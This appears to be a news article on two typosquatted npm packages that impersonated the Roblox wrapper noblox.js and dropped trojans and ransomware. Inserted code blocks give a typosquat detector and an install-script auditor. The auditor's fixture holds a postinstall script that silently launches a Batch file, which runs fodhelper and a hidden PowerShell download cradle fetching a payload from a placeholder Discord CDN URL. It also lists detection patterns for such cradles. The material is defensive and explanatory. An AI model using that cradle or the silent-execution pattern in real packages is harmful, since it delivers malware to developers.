NPM packages disguised as Roblox API code caught carrying ransomware

Subverted libraries likely intended as a prank but should be taken seriously, say security researchers


Yet another NPM library has turned up infected with malware. Security firm Sonatype on Wednesday said it had spotted two related malicious NPM libraries that were named so they might be mistaken for a popular legitimate module that serves as a Roblox API wrapper.

The two poisoned libraries – noblox.js-proxy and noblox.js-proxies – were typosquatting (named to be confusingly similar to) noblox.js, a Roblox game API wrapper available on NPM and as a standalone download. Roblox is a gaming platform with more than 40 million daily active users.

It was only last week that the Cybersecurity and Infrastructure Security Agency (CISA) published an advisory about another compromised NPM library, ua-parser-js. And only a few days earlier, Sonatype spotted three more NPM libraries packed with cryptomining code.

Attacks on the software supply chain, particularly efforts to target popular code registries like NPM, PyPI, and RubyGems, have unfortunately become commonplace.

The legitimate noblox.js is downloaded about 22,000 times a month from NPM and, according to Sonatype, has been downloaded more than 700,000 times. That kind of volume increases the odds that some developer will mistake a malicious variant for the real thing.
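The mistake the previous paragraph describes can be caught before it ships. The following is an added example, not Sonatype's or npm's code, of a check a project can run over its own dependency list: it flags names that are near-misses of packages the project is known to use, after ignoring case and separators and stripping the kind of suffix (-proxy, -proxies) bolted onto noblox.js here. The known-package list and the sample dependency map are constructed for illustration.

```javascript
// Added example, not Sonatype's or npm's code: flag dependency names that are
// near-misses of packages a project is known to use, the way noblox.js-proxy and
// noblox.js-proxies shadow noblox.js. The known-package list and the sample
// dependency map are constructed for illustration.

// Optimal string alignment distance: insertions, deletions, substitutions and
// adjacent transpositions each cost 1, so "lodahs" is one edit from "lodash".
function editDistance(a, b) {
  const m = a.length;
  const n = b.length;
  const d = Array.from({ length: m + 1 }, (_, i) =>
    Array.from({ length: n + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0)),
  );
  for (let i = 1; i <= m; i++) {
    for (let j = 1; j <= n; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[m][n];
}

// Normalise a name the way a hurried eye does: drop scope, case and separators,
// so "@scope/Noblox.JS-Proxy" and "nobloxjsproxy" compare equal.
function normalize(name) {
  return name.toLowerCase().replace(/^@[^/]+\//, '').replace(/[-_.]/g, '');
}

// Suffixes squatters bolt onto a real name. Stripping them before comparing
// catches "-proxy" / "-proxies" style names that edit distance alone would miss.
const SQUAT_SUFFIXES = ['proxies', 'proxy', 'utils', 'util', 'api', 'lib', 'dev', 'js'];

function stripSquatSuffix(norm) {
  for (const s of SQUAT_SUFFIXES) {
    if (norm.length > s.length + 2 && norm.endsWith(s)) return norm.slice(0, -s.length);
  }
  return norm;
}

// Returns one finding per dependency that is not an exact known name but whose
// normalised form (with or without a squat suffix) sits within maxDistance edits
// of a known package. Distance 0 means "identical once separators are ignored".
function findTyposquats(dependencies, knownPackages, maxDistance = 2) {
  const known = knownPackages.map((k) => ({ name: k, norm: normalize(k) }));
  const findings = [];
  for (const dep of Object.keys(dependencies)) {
    if (knownPackages.includes(dep)) continue; // exact, legitimate name
    const norm = normalize(dep);
    const candidates = [norm, stripSquatSuffix(norm)];
    let best = null;
    for (const k of known) {
      for (const c of candidates) {
        const distance = editDistance(c, k.norm);
        if (distance <= maxDistance && (best === null || distance < best.distance)) {
          best = { package: dep, lookalikeOf: k.name, distance };
        }
      }
    }
    if (best) findings.push(best);
  }
  return findings;
}

// Constructed sample input: a package.json "dependencies" map that mixes the two
// names from the article, a separator-dropped variant, a transposed name and
// genuine packages, plus the short allow-list it is checked against.
const SAMPLE_DEPENDENCIES = {
  'noblox.js-proxy': '^1.0.0',
  'noblox.js-proxies': '^1.0.0',
  'nobloxjs': '^4.0.0',
  'noblox.js': '^4.0.0',
  'lodahs': '^4.17.0',
  'express': '^4.17.1',
  'lodash': '^4.17.21',
};
const KNOWN_PACKAGES = ['noblox.js', 'express', 'lodash', 'ua-parser-js'];

console.log(findTyposquats(SAMPLE_DEPENDENCIES, KNOWN_PACKAGES));
```

Run against a real lockfile, the known-package list would be the project's reviewed dependencies or a curated list of popular packages; the suffix list and the distance threshold of 2 are tuning assumptions, and a low threshold is deliberate because every hit is meant to be read by a person.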

Sonatype spotted the villainous modules on October 20th and 26th, before much damage could be done. GitHub, which now operates NPM, is said to have removed the bad code within an hour of Sonatype's report.

"Since we discovered the two typosquats so quickly, they both had minimal impact with noblox.js-proxy seeing 281 total downloads and noblox.js-proxies seeing 106 total downloads, but it’s clear what type of scale the threat actors were hoping for going after such a popular component," said Juan Aguirre, a security researcher at Sonatype in a blog post.

Seemingly a new frontier for ransomware

Aguirre observes that the malicious libraries contained trojans and ransomware, the latter of which hasn't been seen before in package registry subversion attempts.

The lookalike libraries copied the appearance of the noblox.js GitHub repo, but they included a postinstall script that contained a suspiciously obfuscated function.

The Windows Batch file that function launched proved to be deliberately obscured through several layers of encoding, but Aguirre was ultimately able to determine that the script first tries to bypass Windows User Account Control using fodhelper, a Windows binary, and then uses PowerShell download "cradles" – one-line commands that fetch code and run it – to retrieve several malicious executables.

The files – exclude.bat, legion.exe, 000.exe, and tunamor.exe – were fetched from Discord's CDN, which has become a popular malware distribution channel.
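Everything in that chain leaves traces in the package tarball itself: a lifecycle hook, a script that builds or launches a Batch file, and strings such as fodhelper, a PowerShell cradle or a Discord CDN URL. The following is an added example, not code from Sonatype, npm or the noblox.js project, of an audit that walks a package's install hooks into the files they reference and reports those indicators. The indicator list is a set of heuristics chosen for this example, not a published signature; the manifest and files it runs over are constructed stand-ins, not the real payload.

```javascript
// Added example, not code from Sonatype, npm or the noblox.js project: audit the
// lifecycle hooks of a package for the dropper chain described above, where an
// obfuscated postinstall script launches a Batch file that tries fodhelper for
// UAC bypass and then PowerShell download cradles. The indicator list is a set of
// heuristics chosen for this example, not a published signature, and the manifest
// and files below are constructed stand-ins, not the real payload.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// A hit means "a human should read this", not "this is malware".
const INDICATORS = [
  { id: 'batch-launch', re: /\b\w[\w.-]*\.(bat|cmd)\b/i, why: 'references a Windows Batch file' },
  { id: 'powershell', re: /\bpowershell(\.exe)?\b/i, why: 'invokes PowerShell' },
  { id: 'encoded-command', re: /\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+\/=]{20,}/i, why: 'PowerShell -EncodedCommand payload' },
  { id: 'download-cradle', re: /\b(iex|invoke-expression)\b[\s\S]{0,200}\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b|\b(downloadstring|downloadfile|invoke-webrequest|iwr)\b[\s\S]{0,200}\b(iex|invoke-expression)\b/i, why: 'PowerShell download cradle (fetch and execute in one line)' },
  { id: 'fodhelper', re: /\bfodhelper(\.exe)?\b/i, why: 'fodhelper.exe, the auto-elevating binary used for UAC bypass' },
  { id: 'discord-cdn', re: /cdn\.discordapp\.com\/attachments\//i, why: 'payload hosted on the Discord CDN' },
  { id: 'long-base64', re: /[A-Za-z0-9+\/]{120,}={0,2}/, why: 'long base64 blob, likely encoded code' },
  { id: 'hex-escaped-string', re: /(\\x[0-9a-f]{2}){8,}/i, why: 'hex-escaped string literal, a common obfuscation' },
  { id: 'char-code-obfuscation', re: /String\.fromCharCode\s*\(/, why: 'String.fromCharCode construction, a common obfuscation' },
];

function scanText(text) {
  return INDICATORS.filter((ind) => ind.re.test(text)).map(({ id, why }) => ({ id, why }));
}

// manifest: parsed package.json. files: relative path -> contents of files shipped
// in the tarball. Starting from each hook's command line, any shipped file whose
// path appears in the text just scanned is followed, so postinstall -> JS -> BAT
// is walked as one chain and every indicator records the file it was found in.
function auditInstallScripts(manifest, files = {}) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const indicators = new Map();
    const visited = new Set();
    const queue = [{ where: 'package.json', text: cmd }];
    while (queue.length > 0) {
      const { where, text } = queue.shift();
      for (const hit of scanText(text)) {
        if (!indicators.has(hit.id)) indicators.set(hit.id, { ...hit, where });
      }
      for (const [path, body] of Object.entries(files)) {
        if (!visited.has(path) && text.includes(path)) {
          visited.add(path);
          queue.push({ where: path, text: body });
        }
      }
    }
    findings.push({ hook, command: cmd, filesFollowed: [...visited], indicators: [...indicators.values()] });
  }
  return findings;
}

// Any lifecycle hook is worth a look on its own; hooks with indicators are escalated.
function riskLevel(findings) {
  if (findings.length === 0) return 'none';
  return findings.some((f) => f.indicators.length > 0) ? 'high' : 'review';
}

// Constructed sample: a lookalike manifest whose postinstall runs a JS file that
// assembles a Batch file from character codes and launches it. The Batch text is
// a stand-in written for this example, not the real dropper.
const SAMPLE_MANIFEST = {
  name: 'lookalike-example',
  version: '1.0.0',
  scripts: { postinstall: 'node postinstall.js' },
};
const SAMPLE_FILES = {
  'postinstall.js': [
    "const { execSync } = require('child_process');",
    "const { writeFileSync } = require('fs');",
    'const b = String.fromCharCode(64, 101, 99, 104, 111, 32, 111, 102, 102);',
    "writeFileSync('run.bat', b);",
    "execSync('cmd /c run.bat', { windowsHide: true });",
  ].join('\n'),
  'run.bat': [
    '@echo off',
    'rem stand-in for the obfuscated dropper: elevate, then fetch and run payloads',
    'start fodhelper.exe',
    'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(' +
      "'https://cdn.discordapp.com/attachments/0/0/exclude.bat')\"",
  ].join('\n'),
};

const sampleFindings = auditInstallScripts(SAMPLE_MANIFEST, SAMPLE_FILES);
console.log(riskLevel(sampleFindings), JSON.stringify(sampleFindings, null, 2));
```

In practice the `files` map would be read from the unpacked tarball (`npm pack` then extract) before `npm install` ever runs the hook, and the cheapest mitigation for a CI pipeline that needs none of these hooks is `npm ci --ignore-scripts`; the audit above is for deciding whether a package that does need them deserves a closer look.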

The first, exclude.bat, tries to disable antivirus programs. The second, legion.exe, tries to drop various files for stealing Discord tokens and stored browser and system credentials.

The third, 000.exe, drops nuisance executables and a video that's supposed to be ominous. And the fourth, tunamor.exe, shows up in VirusTotal as a Remote Access Trojan, or RAT, that appears to be related to TAIDOOR.

"Taking a look at the executable itself, we can see this isn't just a RAT, this is ransomware and it's likely our bad actors are after a payday," said Aguirre.

Or maybe a belated Halloween prank

However, Aguirre sees the textual hints in the code and the moody video as a sign that this incident is more likely to be a prank attack than a serious operation.

And his colleague, Ax Sharma, a senior security researcher and advocate at Sonatype, said much the same in an email to The Register.

"While the trojans and ransomware within this package are fully functional, we have reason to believe this is a prank more than an actual, profitable operation for them – the presence of a 'spooky' video and what appears to be MBRLocker ransomware are big indicators," said Sharma.

"The bigger implication to keep in mind is that threat actors can infiltrate open source ecosystems through near-miss typosquats or dependency confusion hijacks and use it to distribute ransomware, which is what’s novel about this particular effort. This is the first time we’ve seen ransomware distributed as part of a malicious attack on an open source ecosystem."

Asked why NPM failed to catch these bad packages when they were created, Sharma said it's a consequence of open source ecosystems and registries needing to maintain low barriers to entry so anyone in the community has an easy way to contribute.

"The downside to this, however, means keeping malware out of registries can be a challenge," said Sharma. "Further complicating the matter is a gray area where security researchers will post proof-of-concept test packages as a part of research or bug bounty activities. What is seen as an effort to be more open, unfortunately means many open source registries don’t have strict security validations that could keep malicious typosquats and packages out."

Sharma said the lack of strict namespacing in repositories like NPM, PyPI, and RubyGems exacerbates the problem.

"Strict namespacing is deeply enforced in repositories like Sonatype’s Maven Central and GoLang’s pkg.go.dev," explained Sharma.

"For example, a threat actor could not just publish a malicious package to Maven Central under the org.apache namespace that could be mistaken for an official Apache package – they would have to first prove they own the apache.org domain. This is one of the deterrents we have in place to minimize the possibility of and impact from any malicious code uploads." ®

Biting the hand that feeds IT © 1998–2022